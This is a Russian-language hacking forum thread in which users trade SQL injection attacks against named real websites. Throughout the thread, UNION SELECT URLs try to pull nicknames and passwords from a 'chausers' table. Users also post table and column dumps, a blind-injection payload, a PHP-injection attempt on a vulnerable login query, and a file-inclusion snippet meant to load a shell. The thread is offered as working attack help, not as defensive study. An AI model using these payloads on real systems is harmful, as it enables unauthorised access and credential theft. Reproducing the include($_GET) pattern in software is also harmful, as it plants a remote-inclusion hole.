Вот проблемка Нашел Sql раскрутил и вот Code: http://www.oke.ru/xo4u.php?id=-42708+UNION+SELECT+1,2,concat_ws(0x3a,nick,passw),4,5,6,7,8,9,10+FROM+chausers/* но ниче не выводит Таблицы Code: COLLATIONS. COLLATION_CHARACTER_ SET_APPLICABILITY. COLUMNS. COLUMN_PRIVILEGES. ENGINES. EVENTS. FILES. GLOBAL_STATUS. GLOBAL_VARIABLES. KEY_COLUMN_USAGE. PARTITIONS. PLUGINS. PROCESSLIST. REFERENTIAL_CONSTRAI NTS. ROUTINES. SCHEMATA. SCHEMA_PRIVILEGES. SESSION_STATUS. SESSION_VARIABLES. STATISTICS. TABLES. TABLE_CONSTRAINTS. TABLE_PRIVILEGES. TRIGGERS. USER_PRIVILEGES. VIEWS. chamess. chamess_old1. charooms. chausers. mess. wants. Колонки в chausers Code: idate nick email chalogid lastdate roomid passw
Мистерео 3 и 5 - "Рабочие столбцы", именно их выводит скрипт 5.1.16-beta-log gsokecomru@localhost а так все выводит Пример
Как понять не выводится? А надпись "фанатик" жирным шрифтом тебя не настораживает? В этой таблице инфа которую юзеры пишут в комментариях, что ты там хочешь найти?
Мистерео не знаю как у вас а у меня вообще 7 колонок..)) нету там вобше ничего в бд.) 4 поломаные таблицы information_schema и oke.chausers. достаем колонки данной таблицы.) тут мы получаем id и nick тех людей которые пишут коменты...) а где ты там вобше login увидел? тоесть колонка passw - пустая. намного интереснее будет почитать желания..))
хм.. может попробовать закрыть кавычки с тем же бэкслэшем? если можно линку, то я подумаю.. просто не могу я думать, смотря на голые мускульнуе запросы=)
хм.. даже и не понял как там что то можно реализовать... ведь то что выводится ошибка после подстановки кавычки еще не осначает что есть возможность проведения инъекции.. может быть просто в скрипт передано неправильное значение, вот он и ругается, а попытки что то из этого выжать провалились с треском.. по крайней мере у меня..
ну например можно слепую инъекцию использовать: Code: http://www.idshop.ro/index.php?main_page=index&cPath=9999999999999' WHERE tracking_id=134205 or if ((select 1)=1,1,(select 1 union select 2))=1%23 для закомментирования надо использовать решетку (%23) но на самом деле там есть скули с выводом
есть следующая страничка Code: <? $query="select * from spisok_users where user_name='$login' and password='$password'"; $result=mysql_query($query, $db); $row=mysql_num_rows($result);?> так вот можно ли как то изменить ее чтобы сделать из php-инъекцию? пробывал ?password='%22;echo%22ghbdtn%22;exit; или такое вообще не возможно?
Тут есть SQL иньекция, если поля $password и $login выше не фильтруются. Вообще, сначала читай тут, а только потом спрашивай: https://forum.antichat.ru/thread43966.html
Тогда ты ничего сделать не сможешь, про пхп почитай тут: https://forum.antichat.ru/thread54355.html https://forum.antichat.ru/thread56756.html
Ребят ткните носом где то нетак давно я видел сервис, суть его заключалась в том что я ввожу url сайта в ответ мне показывает какие папки есть на сайте
ыы. Вот, я переделал! :d PHP: <?php if (!empty($_GET['bla'])){include($_GET['bla']);} else {echo "не взломал=\";} ?> script.php?bla=shell.txt И станешь ты взломщиком скриптов!
